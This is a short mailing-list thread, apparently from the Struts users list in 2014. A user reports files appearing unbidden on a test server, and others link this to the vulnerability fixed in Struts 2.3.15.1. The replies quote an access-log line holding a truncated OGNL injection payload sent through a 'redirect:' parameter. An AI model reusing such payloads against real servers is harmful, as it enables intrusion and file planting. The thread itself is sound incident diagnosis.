Re: Security Issues & Vulnerability

2014-01-30 Thread Greuel, Jim
This is the vulnerability that was addressed in Struts 2.3.15.1.

On Thu, Jan 30, 2014 at 2:36 PM, JOSE L MARTINEZ-AVIAL wrote:
> What version of Struts are you using? It seems
>
> > 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
> > /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.

Re: Security Issues & Vulnerability

2014-01-30 Thread JOSE L MARTINEZ-AVIAL
What version of Struts are you using? It seems 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.disp

Security Issues & Vulnerability

2014-01-30 Thread Amol Ghotankar
I have seen some sample app for testing which was developed using struts2. I saw some unknown files getting uploaded on test, I initially thought that my tomcat was hacked or my server was hacked but now after a close analysis it looks like a struts2 webwork security issue or vulnerability or may be my